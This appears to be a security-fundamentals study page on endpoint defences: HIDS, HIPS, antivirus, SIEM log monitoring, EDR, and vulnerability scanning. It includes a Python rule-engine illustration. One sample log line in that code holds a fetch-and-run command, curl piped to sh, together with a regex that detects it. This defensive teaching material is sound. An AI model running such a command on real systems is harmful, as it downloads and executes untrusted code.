VICEINTELPRO
GitHub: HorrorClause

Endpoint Security

Host Intrusion Detection

Host intrusion detection systems, also known as HIDS, are software installed on an endpoint that detects suspicious or malicious activity by checking observed activity against rules describing known malicious patterns. This security control generates alerts (hence the name host intrusion "detection" system) so that human analysts can investigate further from the HIDS solution's interface. Alternatively, alerts can be pushed to a SIEM platform (covered below under Log Monitoring) to prompt analysts to investigate.

Host Intrusion Prevention

Host intrusion prevention systems, also known as HIPS, are software installed on an endpoint that works similarly to HIDS but is able to take autonomous action to defend the system once malicious activity has been detected, instead of only alerting human analysts (hence the name host intrusion "prevention" system). Rules are still written to search for specific patterns of activity, but with HIPS each rule also carries an action, so the software knows what to do when the pattern is matched. Actions can include terminating connections to websites or IP addresses, deleting malicious files, or generating an alert.

Anti-Virus Solutions

Anti-virus software, commonly abbreviated to "AV", should be deployed on all endpoints, such as desktops, laptops, and servers. It is a fundamental security control that works to detect and remove known malware present on the system. There are two types of anti-virus solutions:

  • Signature-based: The AV solution uses signatures, which are specific patterns of activity, to identify previously documented malware, then removes the file, generates an alert, or quarantines the malware. Unfortunately, if the AV vendor does not have a signature for a particular piece of malware, this type of anti-virus will not detect it and the malware can potentially execute successfully.

  • Behavior-based: This type of unconventional AV works to identify suspicious behavior by creating a baseline of "normal" activity and working to identify any deviations or anomalies that don't fit the baseline, as these could indicate suspicious or malicious activity.

Log Monitoring

Endpoints can be configured to send logs to a centralized location, a SIEM platform, where this data is aggregated, normalized, and matched against a number of rules designed to detect and flag suspicious or unusual activity so it can be investigated by security analysts. If an endpoint that is sending logs, whether a desktop, laptop, or server, starts acting unusually, the SIEM should pick this up and generate an alert to trigger a human investigation. Syslog combined with a SIEM platform is one way to achieve this level of logging and monitoring. We will cover this in much more detail in the SIEM domain.
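The following is an added illustration, not code from this page or from any HIDS, HIPS or SIEM product: a small rule engine that normalises constructed syslog lines, matches them against rules, and either alerts only (the HIDS and SIEM behaviour described above) or reports a configured response action (the HIPS behaviour). The log lines, the host name ws01, and the rule names and actions are all assumed sample values.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed syslog-style lines standing in for logs an endpoint forwards to a SIEM.
SAMPLE_LOGS = [
    "Mar 10 09:12:01 ws01 sshd[812]: Failed password for root from 198.51.100.7 port 51022 ssh2",
    "Mar 10 09:12:03 ws01 sshd[812]: Failed password for root from 198.51.100.7 port 51023 ssh2",
    "Mar 10 09:12:05 ws01 sshd[812]: Failed password for root from 198.51.100.7 port 51024 ssh2",
    "Mar 10 09:13:40 ws01 cron[901]: (root) CMD (curl http://203.0.113.9/x.sh | sh)",
    "Mar 10 09:14:00 ws01 systemd[1]: Started Daily apt upgrade and clean activities.",
]

@dataclass
class Rule:
    name: str
    pattern: "re.Pattern[str]"
    threshold: int = 1            # matching events needed before the rule fires
    action: Optional[str] = None  # HIPS-style response; None means alert only

RULES = [
    Rule("ssh-bruteforce", re.compile(r"sshd\[\d+\]: Failed password for (\w+) from (\S+)"),
         threshold=3, action="block-ip"),
    Rule("pipe-to-shell", re.compile(r"curl\s+\S+\s*\|\s*sh\b"), action="kill-process"),
]

def parse(line: str) -> Tuple[str, str]:
    """Minimal normalisation: strip the syslog header and return (host, message)."""
    m = re.match(r"^\w{3}\s+\d+ \d\d:\d\d:\d\d (\S+) (.*)$", line)
    return (m.group(1), m.group(2)) if m else ("unknown", line)

def evaluate(lines: List[str], prevent: bool = False) -> List[Tuple[str, str, str, str]]:
    """Return (rule, host, evidence, action) tuples. prevent=False mirrors HIDS
    (alert only); prevent=True mirrors HIPS and reports the rule's configured action."""
    alerts = []
    hits: Dict[tuple, int] = {}
    for line in lines:
        host, msg = parse(line)
        for rule in RULES:
            m = rule.pattern.search(msg)
            if not m:
                continue
            key = (rule.name, host) + m.groups()   # count per rule, host and captured fields
            hits[key] = hits.get(key, 0) + 1
            if hits[key] == rule.threshold:        # fire once, when the threshold is reached
                action = rule.action if prevent and rule.action else "alert"
                alerts.append((rule.name, host, m.group(0), action))
    return alerts
```

Running `evaluate(SAMPLE_LOGS)` yields two alert-only findings; `evaluate(SAMPLE_LOGS, prevent=True)` yields the same findings carrying the `block-ip` and `kill-process` actions instead.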

Endpoint Detection and Response

EDR agents are pieces of software that sit silently on endpoints and provide logging, monitoring, and reactive capabilities. Similar to HIDS and HIPS, EDR agents report activity back to a platform similar to a SIEM, where analysts can log in and investigate alerts generated by the EDR solution. These solutions typically allow analysts to conduct investigations directly from the platform, see exactly which processes are running on monitored systems, and analyze suspicious activity in depth. EDR platforms can also be used to monitor for insider threats by closely watching what particular users are doing; combined with other forensic-grade tools, they can retrieve specific information from a system such as sites visited, messages sent, and programs run.

Vulnerability Scanning

Routine vulnerability scans should be conducted against endpoints to detect misconfigurations, security flaws, and vulnerabilities that could be exploited by an attacker to gain access to a system, execute malicious code, or cause a denial of service. These scans can be conducted either internally or externally.

  • External scans: typically conducted by scanners in the cloud, these provide an organization with an "attacker's view" by showing which systems and weaknesses can be discovered on internet-facing systems with security controls and firewalls in place.

  • Internal scans: these give a more comprehensive view of the security posture of internal systems, but do not necessarily reflect what an attacker would see unless they had already gained access inside the network and started vulnerability scanning from within.

Scans can be either credentialed or non-credentialed. In a credentialed scan the scanner is able to log in to systems with high privileges and collect far more information about configurations, program versions, and more. A non-credentialed scan, however, gives a better view of what an attacker would see, and can help prioritize which vulnerabilities have a higher likelihood of being exploited so they can be remediated first.

Once a vulnerability scan is complete, the results should be analyzed and sent to appropriate system owners so they can be addressed.

Compliance Scanning

Some compliance frameworks require endpoints to meet a minimum standard of security, and vulnerability scanners will often have profiles or pre-set setting configurations to look specifically for details that the compliance framework covers, allowing defenders to see if any systems do not meet the requirements. We will cover compliance in more detail in the next section of the Security Fundamentals domain.


Last updated 3 months ago
